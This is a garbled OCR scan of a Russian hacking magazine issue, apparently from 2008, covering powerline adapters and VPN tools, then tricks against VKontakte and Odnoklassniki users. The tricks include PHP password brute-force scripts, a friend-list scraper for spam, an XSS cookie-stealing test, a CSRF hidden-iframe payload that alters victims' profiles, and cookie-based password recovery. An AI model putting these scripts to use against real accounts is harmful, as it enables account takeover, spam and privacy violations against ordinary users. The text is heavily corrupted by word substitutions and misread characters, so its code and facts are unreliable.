провода,  проложенные во прошлом веке, навал изгибов да поврежде-  ний, спешно сделанные «скрутки» да оставшиеся ужасы. В итоге  получаем разделяемую среду (одна получи всех) да множество помех, не без; которыми нужно раз как-то бороться. Ничего малограмотный напомина-  ет? Условия весть похожи возьми радио-эсрир, вследствие чего тогда  используются по существу те а самые алгоритмы моду-  ляции равно миросозерцание передачи сигнала. Занимается модупя-  цией/демодупяцией сепаратный РЮ-модем - в частности симпатия  вставляется во розетку, а через него ко компьютеру так тому и быть самый заурядный патчкорд (хотя существуют версии 015В, хотя сие редкость). Для передачи применяют зона несущих  частот с 0,6 накануне 00 МГ ц. Канал передачи данных образуется  84-мя поднесущими частотами. Используется полудуплек-  сный нагрузка передачи (то лакомиться - всего либо прием, либо  передача). Поскольку электрическая яруча единственная, равным образом во ней вдруг может рости небольшую толику повторять  дающих адаптеров, - имеет поприще расчленение физической  среды. Для организации доступа для среде применяется тратить  токол С5МА/СА (Саггіег зепзе тиКірІе ассе$$ ѵѵіДі соііізіоп  аѵоібалсе). В знак через классического пользу кого ЕІЬеглеІ-сетей  метода С5МА/С0 (соііізіоп беіесііоп) тогда отдельный однажды за передачи приятельница пролет ждет подтверждения приема.  Если доказательство неграмотный получено, считается, почто произошла  коллизия, равным образом сквозь вероятностный пространство времени сдача  повторяется.     Что нужно?   Давай разберемся, что-то нам понадобится, ради создать  локальную трал путем обычной электрической проводки?  Вся притягательность на том, что-то тебе надо заслужить только лишь банан  Роѵѵегііпе-адаптера. А51І5 РІ_-Х31 - дешёвый равным образом весь доступ-  ный тип (только-только появившийся во продаже). Адаптер  построен от применением стандарта НотеРІид АѴ, тот или иной ис-  пользуют равным образом кое-кто вендоры, равным образом подразумевает передачу данных для скорости по 000 Мбит/с (в идеальных условиях, аюшки? практи-  чески нереально) да поддержку шифрования.   Характеристики продукта   • Порты: 0 х АС 000 Мбит/о РІ_С + 0 х 00/100 ЕІЬегпеІ   • Напряжение питания: 000-240 В быть 00-60 Гц   • Размеры: 012 х 00 х 07,2 мм   • Шифрование данных: 028-бит АЕ5   • Максимальное удаление: 000 м   • Поддержка Оиаіііу о( Зегѵісе (Оо5)   • Совместимые ОС: ѴѴІпсІоѵѵз 08, 0000, ХР, Ѵівіа   У меня на флэту игра стоит свеч маршрутизатор, тот или иной автоматом  выдает ІР-адреса (установлен ОНСР-сервер) равным образом враз  является шлюзом на инет. Не предвидя в отношении принципе работы девайсов, ваш покорнейший слуга думал, зачем придется растянуто вместе с ними колдовать, возглавлять таблицу  маршрутизации равным образом многообразно заморачиваться, с намерением влить ко  роутеру сызнова сам маршрутизатор во удаленной комнате, пупок развяжется безвыгодный был  протянут тенетный кабель. Но безвыездно оказалось просто, по образу в двойном размере  два. Водан изо адаптеров РІ_-Х31 автор воткнул на розетку рядом вместе с мар-  шрутизатором да соединил их патчкордом, а новый - подключил для компьютеру во удаленной комнате, идеже как бы крата была незамужняя  розетка. Каково но было мое удивление, когда-когда сеточный плата в компьютере тута но получил ІР-шник ото мои маршрутизато-  ра да подключился для инету. Настройка заключая никак не нужна! После  проверки АРР-таблиц отсюда следует ясно, зачем сетевые адаптеры хоть далеко не подозревают по части наличии каких-то промежуточных устройств  - двушник роѵѵегііпе-адаптера на самом простом случае выступают  просто, на правах «умный» отрывок сетевого кабеля, передавая пакеты за обычной проводке. Замечу, почто любая перенесение осуществпя-        ► Бизнес | «Свой Бизнесп   Рекорды А5Ы5   Новинки | МАХІ Типіпд   А51І5 І_атЬогдЬіпі ѴХЗ   В этом месяце Железо | «Железо» на других журналах клуба: Обзор \Л/і-ГІ-роутера А5115 ѴѴІ_-500дР ѵ2     ЖУРНАЛЫ-УЧАСТНИКИ: СТРАНА ИГР | МАХІ ТІІИІНС | СВОЙ БИЗНЕС   ЖЕЛЕЗО | ХАКЕР | МОБИЛЬНЫЕ КОМПЬЮТЕРЫ        ется до невозможности на зашифрованном виде.   Для работы нескольких девайсов кое-когда может уйти их маленечко отконфигурировать. Делается сие от через специ-  альной утилиты - А51І5 РІ_-Х31. В окне программы отображаются  устройства (а точнее, их МАС-адреса), подключенные непос-  редственно для компьютеру, а и найденные посредством электричес-  кую сеть. Программа иногда отправляет на трал пакеты не без; запросом, благодаря тому перечень доступных девайсов вместе с указанием  уровня приема равно возможной скорости передачи данных посто-  янно обновляется. Если принимать нужда проделать приватную  сеть, -  со через специальной вкладки не возбраняется приказать девайс нести протоколы и заботы только лишь  со определенными адаптерами.   Тебе интересно, сколько мирово сие работает? В рамках квартиры  - беда хорошо! Для тестирования проводного сегмента моя персона заюзап  программу ЫеТО СЬагіоІ да скрипт ТЬгоидЬриІ вместе с передачей пакетов  максимального размера. На двух станциях устанавливались эдак назы-  ваемые епфоіпі-программы, по времени на рента №Ш СЬагіоі запускался  скрипт генерации трафика. Конечно, заявленные стандартом 000  МБит/с выстрадать ни удалось, однако 00 Мбит/с - тотально реальная цифра, безо задержек да потерь пакетов. В какой приглянется точке квартиры равно приземленно от любых розеток резвость оставалась примерно неизменной. Надо сказать, что-нибудь на моем доме отмечено средства ради подключения ко  интернету изо розетки. И автор этих строк малограмотный исключаю, что такое? сие может основательно внушать для прыть работы устройств А51І5. В любом случае, пусть даже 00 Мбит/с шабаш чтобы просмотра видео на реальном времени. К сожалению, попытка вместе с подключением для адаптеру, установленному на другом  подъезде, провалился - устройства побратанец друга уж безграмотный видели.   А на правах но безопасность?   Я уж говорил: производителем заявлена поддержание шифро-  вания  со через 028-битного алгоритма АЕ5. Однако безграмотный целесообразно  забывать, ась? для того передачи данных используется развратница среда,      а почему для вопросу безопасности  нужно приблизиться особенно ответс-  твенно. Лучше всего, выключая ап-  паратного шифрования, восполь-  зоваться пока что равным образом ѴРІМ-соединением.  И, дай тебе невыгодный морочить себя голову, ваш покорнейший слуга бы рекомендовал двум полезных  инструмента:   РетоЬо 0.13   ѵѵѵѵѵѵ.гетоЬо.сот   Статус: Ггееѵѵаге  Это условно новая утилита,  аналогичная нашумевшей равно бесчисленно разок нами расхваленной програм-  ме НатасЬІ, которая позволяет учредить ѴРГІ-соединение двумя  кликами мыши кроме какой-либо  изнурительной настройки равным образом гемор-  роя. В случае из РетоЬо частная ахан называется Іпзіапі РгіѵаЬе  Меіѵѵогк (ІРІМ) - создатели акцентируют почтение нате мгновеннос-  ти подключения (іпзЬапІ:). И действительно: надлежит только лишь увлекаться распустить получи и распишись каждом изо компьютеров клиентскую пакет равным образом наболтать  нужных пользователей на контакт-лист. В итоге автор сих строк обретаем безвыездно красоты ѴРЛ:   • периферийный подход ко домашнему компьютеру равно его файлам;   • безобидный шаринг файлов;   • адаптация процедуры видеоконференций, да сеточный зрелище во  разных играх.   Весь затор шифруется от через 056-битного АЕ$ алгоритма.   СЬгМде 0.0   ѵѵѵѵѵѵ.оЬгіфе.сот   Статус: Ггееѵѵаге   Безопасная синхронизирование директорий, шаринг файлов, бэкап,  а в свой черед далёкий пролетарский тормоз при помощи ѴРІ\І, основанный держи ис-  пользовании возможностей Соодіе Таік. Что особенно приятно, построение работает аж во книжка случае, неравно твоя милость находишься из-за  файрволом тож МАТ"ом.   Любые информация передаются на криптованном виде (АЕ5 028-бит),  а активизация осуществляется от через сессионных ключей  (8НА1 НМАС).      4        рс_гопе        АНДРЕИ КОМАРОВ   / /      Фокусы во социальных  сетях |       Где бы твоя милость ни смотрел во монитор, до скорого свидания в таком случае веб-зона гостиницы, слушатели     іудиторю   1 _ во университете, общепринятый контора alias несложно на флэту у соседа, твоя милость практическ равным образом | куда ни глянь увидишь впредь до боли знакомые интерфейсы «Вконтакте» равно «Одноклассни-  ков». Люди подсели — равным образом подсели серьезно. Обн обвить пр оф иль равно выложить  фотки сможет ажно твоя баб просто-напросто избранным. Итак, вникай.   ЕЕШВ   ПОДБИРАЕМ ПАРОЛЬ ПОЛЬЗОВАТЕЛЯ ѴКОМТАКТЕ.КЦ   Если первоначально самым частым вопросом было «Как разворотить почтовый ящик», так об эту пору новоизобретённый тренд — и оный и другой считает своим долгом вобрать в себя слово получай профессия своей подруги/девушки/соседа (нужное подчеркнуть). А потому что относительная пользователей социальных сетей знакомы не без; компьютерами как только издалека, в таком случае да никак не в особицу заморачиваются, выставляя пароль. «1234» либо — либо свое термин — сие совсем стандартная ситуация. Что ж шелковица удивляться, сколько подогнуть (тьфу, несомненно же, возбудить забытый) пропуск вот многих  случаях практически невыгодный просто, а адски просто. И быстро. Собственно, безграмотный  нужно хоть каких-то специальныхутилит. Вполне довольно простенького  РНР-скрипта.   Начинаем сустановки параметров брутфорса:   $ешаі!=" ;     ГипсСіоп ЪгиСе ( $етаі1 , $разз ) {   $Гр=Гзоскореп( "ѵкопбакбе.ги" , 00 , $еггпо, $еггзбг, 00) ;  $оиС="СЕТ /1одіп.р1ір?етаі1=" . $етаі1 . "&разз=" . $разз .  " НТТР/1 . 0\г\п" ;   $оиС .="Нозб: ѵкопСакке . ги\г\п" ;   $оиб .="Юзег-АдепС: $изег_адеп1:\г\п" ;   $оиС .="Соокіе: іпсоше=1\г\п" ;   $оиС .="СопСепС-Туре : СехС/хшІ ; скагзеб=м1пс1омз-1251\  г\п\г\п" ;   Гмгібе ( $Гр, $оиб) ;   $апз=" " ;   ѵгііііе ( ! Геоб ( $Гр) )     {     $апз .=ГдеСз ($Гр, 02 Е     # Мыло пользу кого брута  $раззм="1234567";   # Пасс интересах брута   $бісб=(ібііе ( "бісСіопагу . ЬхС " ) ;   # Файл со словарем паролей сиречь мыл  $Суре=2;   # Тип атаки 0 — возьми одно сериал соответственно словарю паролей , 0 — получи и распишись единовластно лозунг сообразно словарю мыл   $гези1С="раззжэгсі. СхС " ;   # Файл из найденным паролем   $изег_адепб="Орега/9.50 (Міпс1оѵ73 ЫТ 0.0; II; ги) " ;   # ІІзег-адепІ:     }   Гсіозе ( $Гр) ;   іб (ргед_табс1і ( " /\Ь302 Роипсі\Ь/із " , $апз) )  гебигп Сгие;  еізе гебигп Гаізе;   }   Если ну что-то ж наем в соответствии с словарю, эту функцию нужно пригласить столько раз, в какой мере возможных вариантов на словаре  со пассами. Или ради каждого  етаіГа изо базы, ежели говор касательно попытке завернуть  со распространенным паролем  (например, 0 03456). В целях экономии, нынешний безыскуственный кодя неграмотный привожу, однако  полную версию скрипта твоя милость можешь отыскать на приложении держи диске.     Далее пишем простую функцию чтобы осуществления попытки входа.  Скриптоснован сверху нехитром способе авторизации — от через  отправки ВЕТ-запроса по части ссылке вида: ѵкопкаксе . ги/1одіп.  рЬр ? ешаі 0=ХХХ&раз з=ХХХ.     Щ ТРИК2:   ПОДБИРАЕМ ПАРОЛЬ ПОЛЬЗОВАТЕЛЯ НА «ОДНОКЛАССНИКАХ»   Если капельку покорпеть, в таком случае отнюдь не составиттруда известить похожий брутфо- прародитель равно пользу кого другого, далеко не не в экий мере популярного, сервиса — обпокіагвпікі.ги .     ► 042     ХАКЕР 01 /119/ 08         рс_гопе           Зкладка «Друзья», фильтр друзей — вставим <ітаде згс=" "  опеггог=а1егр ( ’иовд! " ) . Каквидишь, появилосьуведомление, стал  быть, свой 05-код выполнился. Попробуем усвоить задержанный кук, тот или другой устанавливается сервисом (аіегр (йосшпепр . соокіе) ■     :тало   УК,     Однако используемый на нем подходдля авторизации силь- да отличается. Вместо ОЕТ, используются Р05Т-запросы  вида:   $с!ака=" зк .розкесі=зек&зк . етаі1=$асс&зк .  раззж>гс1=$разз&:Ьиккоп_до=%В0%92%В0%ВЕ%В0%В9%  В1%82%В0%В8" ;   $ге=" РОЗТ кккр : / /Ѵ7І7 . осіпокіаззпікі .  ги/ссЗк/зк . стс1/1одіп/ккп/5 022 НТТР/1 . 0\  пНозк : ѵ?17 . осіпокіаззпікі . ги\п" . "ІІзег-  Адепк : МогіІІа/4.0 (сотракіЫе; МЗІЕ 0 . ОЫ ;  Міпйстз ЫТ 0.1; ЗѴ1 ; .ЫЕТ СЬК 0 . 0 . 0322 ;   М3 ІйепкіЗегѵ 0 . 0 . 02 ) \пКеер-АІіѵе : 0 0 0 \  п" . "Соппескіоп: кеер-аііѵе\пРе1егег :  кккр : / /ѵ?17 . осіпокіаззпікі . ги\п" . "Сопкепк-  Туре : арріісакіоп/х-мѵтм-когт-игіепсосіесіх  п" . "Сопкепк-Ьепдкк : $1еп\п\п$сіака " ; сего на адресной строке набираем аЬоиксопГд, впоследствии зачем из через полина Шег вводим названия нужного парамет-  ра - пеіѵѵогк.ьир.гесіігесііоп-іітіі . Теперь взамен внуши-  тельного списка всевозможных настроек автор сих строк видим всего только  то, который нужно. Нехитрым образом меняем его значительность сверху  О (тем самым запрещая приготовлять переадресации).  Открываем новую вкладку (<СігІ+Т>), грузим страницу  входа Шр://ѵкопІакІе.ги/Іодіп.рЬр да логинимся. Вылезет  ошибка, нотак равно должен быть. Далее — переходим держи  какую-нить другую страницу, как например — Ыір://ѵкопІакіе.  гиДгіепб.рбр . После сего что поделаешь снова распахнуть  вкладку не без; настройками да переменить роль параметра  пеІѵѵогк.Шр.гебігесбоп-ІітіІ: нате дефолтное (обычно — 00).  Готово! Теперьты во инвизе интересах своих друзей, при всем том тебе  придется тщательно нарушать косвенно ссылки, содержа-  щие на адресе «ргоіііе .рЬр».      > ѵѵагпіпд   Полученные познания  используй сумом равным образом жуть осторожно.   В случае их приме-  нения во незаконных  целях я ответствен-  ности невыгодный несем!     ТРИК4:     ИМПОРТИРУЕМ ДНИ РОЖДЕНИЯ ИЗ ѴКОЫТАКТЕ     Запрос осуществляется для 00 порт, да кушать сам сообразно себе видный  нюанс. Дело на том, в чем дело? обпокіавзпікі.ги специальным  образом распределяютзапросы, балансируя нагрузку.  Видишь адресок иі 0 . осіпокіаззпікі . ги? Так вот, во  данном случае просьба уходит нате кое-какой ѵѵ17-сервер.  В общем виде параметр иХХ (где хх — кой-какие цифры) нередко обновляется: осуществляя обилие попыток  авторизации, делать нечего взглянуть кэтому архи  внимательно.     ІТРИК 0:     НЕВИДИМОСТЬ ПРИ СЕРФИНГЕ УКОЩАКТЕ.ІШ   Просмотрев страницу пользователя на «Одноклассниках», твоя милость неотменно оставляешь оттиск — содержатель профиля  узнает, кто именно равным образом эпизодически им интересовался. Отличный род  монетизации: безграмотный хочешь палиться — плати денежку.  «Вконтакте» такую систему никак не практикует, почему тратить наблюдать страницы друзей да подружек можно, почем  влезет, безвыгодный опасаясь вслед свое инкогнито. Другое дело, зачем кое-когда охота залетать для сайт незаметно: так, что-  бы кое-кто никак не заметили твоего появления (а сие выдает окнище «Друзья онлайн» равным образом сведения отвоем профиле).  Впрочем, остаться невидимым можно. Для осуществления  нехитрой операции надобно поломать индивидуальный  параметр на браузере, кто отвечаетза число  одновременных соединений к указа иного узла. Проще токмо сие совершить во МогШа РігеГох, воспользовавшись  служебной страницей к тонкой настройки браузера. Для     За аюшки? ваш покорнейший слуга люблю «Конта кт», та ко сие следовать базу дней рождений  большинства своих знакомых. Уверен, в чем дело? равно у тебя братва совсем прогрессивные и, если бы ажно отнюдь не пользуются серви-  сом, то, по мнению меньшей мере, завели на нем аккаунт, указав личный будень рождения. Ежедневно хаживать в этотресурс, дай тебе  прочекать радостные события, у меня не имеется возможности, вследствие чего бог ладно было бы их оттоль экспортировать.  Наш рецензент — Мігатоѵ <пігатоѵйіпЬох.ги> — написал особливый скрипт, позволяющий памяти равным образом не принимая во внимание проблем претворить подобную операцию. Скачать его допускается до адре-  су : ЫідУ/шбпсщхзІехнші/р/дат^^   Ітипк/ѵк саіепсіаг Ьа( ісв.рі .   В скрипте надлежит определить исключительно мыльная опера равным образом пасс. По завер-  шении действие сохраняются на обложка ісв, каковой на собственном опыте ваш покорнейший слуга им-  портировал во ТЬипсІегЬігсГа от плагином ІідЫпіпд. Выглядит сие приближенно следующим образом:   ФОРМАТ ВЫХОДНОГО ФАЙЛА   ВЕНта : ѴСАЬЕШАВ  ѴЕК8ІОЫ : 0 . О   РКОБІБ : - / /Могіііа . огд/КШЗеМВ Моиіііа   Саіепйаг VI . 0//ЕИ   ВЕ6Ш:ѴЕѴЕШ’   8ЦММАКУ : ФИО   КНЦЬЕ : ЕВЕО=УЕАКЬУ ; ШТЕВѴАЬ=1  БТ8ТАНТ ; ѴАШЕ=ПАТЕ : 00080101  БТЕШ ; ѴАЬиЕ-БАТЕ :20080102  САТЕСОВІЕ8 : Дни рождения     ХАКЕР 01 /119/ 08     ► 043          рС_ЕОПе            Скрипт интересах подбора пароля «В Конта кте.ру»      ШЬ:Ы:1:р: / /ѵкопДакЬе . ги/ісі***   БЕ5СР.ІРТКЖ : Дата Рождения: 01 . 01 . 098б\пФото :  Ъ.ББр ://*** . ѵкопкакЪе . ги/**** /**** . зрд  ЕЫБ : ѴЕѴЕЫТ  ЕЫБ : ѴСАБЕББАК     ТРИК5     КАК ДЕЛАЮТ СЕТЕВОЙ БИЗНЕС НА СОЦИАЛЬНЫХ СЕТЯХ   Хакеры научилисьзарабатывать получи самых различныхтемах, втом числе равным образом  со через социалок. Прежде всего, сие рассылка адвердами, утаскивание аккаунтов вслед деньги, массовая регистрация. Отдача с первого — большая, хоть скудеет от каждым днем, в силу того что что такое? людей, осознавших тему, становится всегда больше.   В качестве программных комплексов интересах спама самыми популярными  стали ѴкопІакІеМеззедегЬуРХ равно одиночный с альтернативных спаммеров  — ОвраттегЬуСбаак. А вообще, та кихтулз огромное сумма да многим  самим почти силу осуществить схожий инструмент. Попробуем?   Сейчас сверху паре примеров автор сих строк модулями накидаем софти ну, которая ужас чрезвычайно должна помочь на нашей опасной работе. Она должна мочь потеть над чем не без;  группами; вырывать друзей пользователя вместе с зада иным Ю; похищать пользователей  группы да распространять сообщения. Делается сие с целью того, с намерением генерировать кон-  текстную рассылку, опираясь держи группы. Полный скрипт наша сестра облицовывать далеко не  будем, так приведем ключевые моменты. Получитьсписокфрендов можнотак:     ЕипсЕіоп ОеСЕгЫзегз ( $соокіе , $ѵкзезз , $зб) {   ІЕ ($зб--0)   $игі=  "ЬЕЕр: / /ѵкопЕакЕе.ги/ Егіеп<3.рЬр?$ѵкзезз&зЕ=$зЕ" ;   еізе   $игі="ЬЕЕр : //ѵкопЕакЬе . ги/Егіеп<3.рЬр?$ѵкзезз " ;  $сЬ=сиг1_іпіб ( ) ;   сиг1_зеЕорЕ ( $сЬ, СШШРТМЖЬ, $игі) ;  сиг1_зеЕорЕ ($сЬ, СШШРТ_СООКІЕ , $соокіе) ;  зеЕРгоху ( $сЬ) ;   сиг1_зеЕорЬ ( $сЬ , СЦКШРТ_ЕЕРЕКЕК , " ЬЕЕр : / /ѵкопЕакЕе .га/")  сиг1_зеЕорЕ ($сЬ, СШШРТЬКЕТЕІШТКІЩЗРЕЕ , 0);  сиг1_зеЕорЕ ($сЬ, СШШРТ_РОЬЕОИШСАТІОКІ, 0);  сиг1_зеЕорЕ ($сЬ, СЕЕЬ0РТ_ТШЕ0ит, 020);   $гези1Е=сиг1_ехес ( $сЬ) ;  сиг1_с1озе ( $сЬ.) ;   ргед_таЕсЬ_а11 ("#<а 0ігеЕ=\ "таіі ,рЬр\   ?асЕ=игіЕе&Ео=( . *? ) \ " ># " , $гези1Е, $т) ;   есЬо "Му Егіепсіз \п" ;   Еог ( $і=0 ; $і<соипЕ ( $т [1] ) ; $і++) {  есЬо "ЫзегІБ - " . $т [1 ) [ $ і ] . " \п" ;   }     Все оставшиеся части скрипта, а то-то и есть розыск пользователей объединение группам да выражение для того отправки сообщений на полном виде выложены получи нашем 0\ЛЭ.      ТРИК6     НЕМНОГО О ПРОВЕДЕНИИ С5КР-АТАК   С через предумышленно сформированной страницы да стих получи и распишись ней злоумыш-  ленники научились заниматься пользователя получи и распишись врученный сайт, идеже настоящий шифр исполнитза него какие-либо действия. Подобные атаки называются  Сго55-5ІІегедие5І Гогдегу (С5Р?Р) равно особенно характерны для того социальных  сетей по вине недостаточной проверки подлинности НТТР-запросов. Нетак  давновлентахбагтракбыл должность об обнаружении такого бага возьми сервисе  ѵкоп{ак{е.гц .Ты впариваешь этотлинк либо исполняешь средствами равным образом у   пользователя во профиле пашня «Сайт» меняется получи указанный:   ЬЕЕр : //ѵкопЕакЕе . ги/ргоЕіІеЕйіЕ .рЪр?раде=сопЕасЕз&зиЬт  =1&«еЬзіЕе=ЬЕЕр : / / зіЕе . сот   Или противоположный пример. При переходе держи сайт, начертанный во качестве веб-  страницы дорогого друга-пользователя, твой браузер исполняет скрипт   <зсгірЕ>   ЕипсЕіоп ЙоіС ( ) {  ѵаг ЕЕгпІ ;   ЬЕтІ="<ітд згс=ЬЕЕр ; //ѵкопЕакЕе . ги/ргоЕіІеЕсІіС .рЬр?р  аде=сопЕасЕз&зиЬт=1&иеЬзіЕе=1іЕЕр: / /зІоузіЕе . сот> " ;   тпскж . Егатез [ " Егт" ] . йоситепЕ . Ъосіу . іппегНТМЬ - ЦЕтІ; }  </зсгірЕ>   <іЕгате пате-"Егт» оп1оай-"йоіЕ { ) " ѵгійЕЕі- " 0 "   Ееі дГіЕ- " 0 "></іЕгате>   Как видно, запрашивается валет вместе с адресом ѵкопЕакЕе.ги/  ргоЕіІеЕйіЕ .рЬ.р?раде=сопЕасЕз&зиЬт=1&иеЬзіЕе=Ь.ЕЕр: //  хІоузіЕе . сот 0 Браузер выполняетзапрос отчего ІІПБ, равным образом бери анкете во  ѵкопіакіетвое край «Веб-сайт» станется равным зіоувііе.сот. Теперь, коли  кто-нибудь увидит надсыл на твоем профиле равным образом да перейдет сообразно нему, то...  изменит себя профайл ит.д., ит. п.Хотя на натуральный час подобная коленце отнюдь не пройдет. По крайней мере, приближенно просто: разработчики включили во  передачу запроса пополнительный параметр НА8Н, каковой фигурируете  каждом запросе подле изменении персональных данных.   Получается линкследующего вида:   ітд згс=ЪЕСр : / /ѵкопЕакЕе . ги/ргоЕіІеЕйіЕ .рЕір?раде=сопЕа  сЕз&1іаз1і=(іаз<і23&зиЬт=1&иеЬзіЕе=1іЕЕр ; / /г ІоузіЕе . сот> " ;   Хэш должно вызнать предварительно, — равно не возбраняется деять та кие фокусы.   А наравне его узнать? Раньше сие был тсІ5 от(ісІ+таіІ), да в тот же миг спица в колеснице  урезано до самого 0 байт. Соответственно, нужно уметь мыложертвы, итогда  получаем ниженазванный то и на языке алгоритм:   Щты знаешь Ш;   ^знаешь мыло;   ^ вычисляешь тсІ5 равно урезаешь хэш-сумму вплоть до 0 элементов;   Щ подставляешь на интерпелляция да выполняешь.     ► 044     ХАКЕР 01 /119/ 08        ТРИК8:      г»-«в (Ія чи- ии-*М«1-#**4 іі*     ■ ШіЫ 0     ■-■і рзн-михши і. п     -   ""     ІІаШі" "Ті ГьК “I     Восстановление пароля изо кукисов     ТРИК7:     КАКУЗНАТЬ, КТО ОСТАВИЛ МНЕНИЕ   «Вконтакте» порядочно популярна налаженность «Мнения», позволяющая  анонимно покидать сообщения. И отдельный читатель может отослать отчёт в мессагу, безвыгодный зная, кому ее отправляет. Узнать, кто такой а оставил что касается тебе сочувственный или, наоборот, безграмотный аспидски лакомый отзыв, бог просто. Необходимо всунуть на ответное депеша ЫсЬр : / /  ѵкопбакбе . ги/табсЪез . рЪр?асб=а_зепб&Ео_ій=[Твой  Ю] &йес=1. Теперь человек, переходя по мнению ссылке, механично  отвечает получи твое предложение!     УЛУЧШАЕМ ИНТЕРФЕЙС С ПОМОЩЬЮ 0КЕА5ЕМ0ЫКЕѴ   Существует бездна скриптов бгеаветопкеу, позволяющих пополнить  интерфейс социальных сетей. В частности, ѵкРаІсб — маленький скрипт чтобы СгеазеМопкеу почти сайт «Вконтакте». С крипт добавляет ссылки сверху Стену, Мнения, Фотографии, Видео ит.д. вблизи вместе с пользователями,  страничка которых удалена сиречь открыта лишь только в целях друзей. Если пользо-  ватель безвыгодный является твоим другом, то, возможно, будут недоступны неко-  торые ссылки, однако, поскорее всего,™ сможешь рассмотреть фотоальбом сего человека иначе внять его музыку. Ссылки бери разделы появля-  ются близко  со человеком во результатах поиска.то убирать сверху ЬНрУ/ѵкопіакіе.  ги/зеагсЬ.р[ір?іб=1 . идеже задним числом ій=идет ій человека. Эта страничка  показывается, буде твоя милость кликнул для имени человека, фаза которого  удалена либо утебя пропал ко ней доступа.     ТРИК9:     ВОССТАНАВЛИВАЕМ ПАРОЛЬ ИЗ КУКИСОВ   Сохраненный знак позволительно вырыть да на кукисах, а с тем безвыгодный выделывать сие  вручную, пригодится тулзаѴКопІакІеСоокіеРаззѵѵогсІРесоѵегу. Она непроизвольно находит соокіев сайта «Вконтакте» во установленных  Іпіегпеі Ехріогег, Рігеіох, Орега, 0а(агі да пытается увести из-под носа изо них па- функция чрез поиска соответствующего МРб-хэша пароля во онлайн-базах  асіафопііпе.сот да развсгаскіпа.ги . Программа используетсобственный станок «извлечения» информации с файлов соокіев всех указанных  браузеров, который безграмотный вечно гарантирует 000% исход быть их анализе  (исправляется объединение мере доход информации об найденных багах), только  зато работаеточеньбыстро. ЗС     Проекторы Ерзоп. Новая реальность!      Кино, компьютерные зрелище равно любимые  ТВ-передачи получай экране размером кайфовый всю стену!  С проектором Ерзоп у Вас дома!  Большой экран, качественное изображение,  комфортный сканирование без участия усталости отверстие -  полное проседание на подвиг бери экране.     ^ ■ I   Экран давно 0 м 0 000 000 000   (диагональ 000") цветов     РиІІНй   1080 р     ^ через 09 050 рублей*   РІ.ГО • Реюжщошнм рентная такса с целью модели ЕРШ ЕМР-йЮ      Узнайте более получай ѵѵѵѵѵѵ.ерзоп.ги      ЕР50ІМ   ЕХСЕЕй ѴОІІВ ѴІ5ІОМ     Москва: Розіегдгоир (495) 021-47-47 • ДеЛайт2000 (495) 025-225-8 • Имидж.Ру (495) 037-37-27 • Лазерный Мир (495) 013-51-82 • ОнЛайн Трейд (495) 037-47-48 • Цифровые Системы (495) 087-44-88 • Роіагіз (495) 055-55-57  ВЗІ (495) 014-14-19 • ЗІагШазІег (495) 085-85-55 • Полимедиа (495) 056-85-81 • Техносила (495) 077-87-77 • Астрахань: ТАН (8512) 09-42-54 Барнаул: ГАЛЭКС (3852) 05-38-01 Белгород: Инфотех (4722) 06-36-18  Благовещенск: А-Эл-Джи Софт (4162) 02-22-60 Воронеж: Рет (4732) 07-93-39 Екатеринбург: Трилайн (343) 078-70-70 Иркутск: ѴЮ МЕОІА (3952) 03-39-19 Казань: Дарфф (843) 099-71-24 Калининград: Ноітгоск  (4012) 07-28-57 • Махітиз (4012) 000-350 Краснодар: Владос (861) 010-10-01 Курск: ФИТ (4712) 01-25-01 Минск: АІІѴізіоп (017) 037-45-90 • Белана (017) 007-81-18 • ПринтЛюкс (017) 016-19-22 Набережные Челны:  Форт Диалог (8552) 09-92-20 • Элекам (8552) 09-82-33 Н. Новгород: Домашний умная машина (831) 077-82-92 • Юст (831) 030-16-74 Новосибирск: ГОТТИ (383) 062-00-44 • НЭТА (383) 004-10-10 • Техносити (383) 032-41-63  Омск: РИТМ (3812) 03-65-27 Пермь: Гармония (342) 012-11-66 Ростов-на-Дону: С0МР1ЯЕК - СІТУ (863) 095-03-33 • ЗТѴШ5 (863) 040-59-67 • Офисный Мир КМ (863) 053-65-00 Самара: ПРАГМА (846) 070-17-01  Санкт-Петербург: БМК (812) 032-4012 • Викинг (812) 093-30-03 • КЕЙ (812) 074 • Компьютерный Мир (812) 033-00-33 Саратов: КомпьюМаркет (8452) 00-40-40 Уфа: Кламас (347) 091-21-12 • Форте-ВД (347) 060-00-00  Хабаровск: Меркурий (412) 01-55-57 Ярославль: Тензор (4852) 006-400            рс_гопе        ВАСИЛИИ ЛЕНСКИІ      СОЫЫЕСТЕО!     МТС продает модем во со  ставе обслуживание МТС Коннект просто-напросто после 0790 рублей, во ведь момент во вкусе неслиянно оный  модем во магазинах нужно вблизи 0000 р.     НЕСТАНДАРТНЫЕ ТРЮКИ ПРИ ИСПОЛЬЗОВАНИИ МОДЕМА МТС КОННЕКТ ряд входит аспидски пользительный девайс - настоящий 00-модем. И хотя|  керской точки зрения равным образом выяснить, получи в чем дело? оно в самом деле спосооно!^^И     Модель самого девайса ни через кого малограмотный скрывается. В коробочке тебя  ждет модем Ниаѵѵеі Е 020 , приготовленный в целях подключения для порту  115В. Устройство, проверенное временем равным образом заслужившее душа со  стороны многих пользователей: объединение всему миру распродано боль-  шое контингент на правах оригинальных Е 020 , круглым счетом равным образом его незначительных  модификаций. Причина очевидна: около всей своей простоте девайс  позволяет легко и просто примазываться для инету, используя технологии 0ШТ5 [в фолиант числе Н50РА), ЕР6Е, 0РВ5 да 05М. Технически сие двойка устройства на одном: раскованно модем да несуществующий СР-ВОМ, тот или другой непроизвольно монтируется во системе равно позволяет тута а найти  необходимые драйвера. Рчень удобно: никаких дисков ненужно, до этого времени заметано бери вделанный 02 Мб диск. Впрочем, изо устройства дозволительно кончать сеять куда как больше, нежели отсоединение держи ноутбуке из установленной  виндой. Приступим?     ХАК №1     ".ЗАПУСКАЕМ МОДЕМ ПОД ЫЫЫХ’ОМ     Обычным пользователям предлагается пускать в ход модем перед виндой.  ѴѴТР?Т.е. лещадь никсами нам придется остаться минуя мобильного инета?   Нифига! Да, во модеме в самом деле зашиты драй конфессия только лишь к ѴѴІпсІомз равно  МАО, так сие безвыгодный значит, сколько его невозможно из-за бросать для других операционных систе-  мах. Чтобы уговорить тебя, расскажу, во вкусе поправить работу Е220 перед Пингвином.  Надо сказать, аюшки? само структура отличный определяется да помимо твоей  помощи: кайфовый период подключения модема оно механически монтируется  как/беѵ/ііуІІЕВ, используя избзегіаі.ко [изЬзегіаІ-депегіс] интерфейс.     Если а нет, значит, на твоей системе используется прежнее опора (младше  2.6.19) да придется скачать сепаратный драйвер, какой-никакой доступен к следовать ка ч ки не без; са йта оозіе.( : т.іп1егіа.р[/рго/Ьиаѵѵеі-е220/ .   Установить 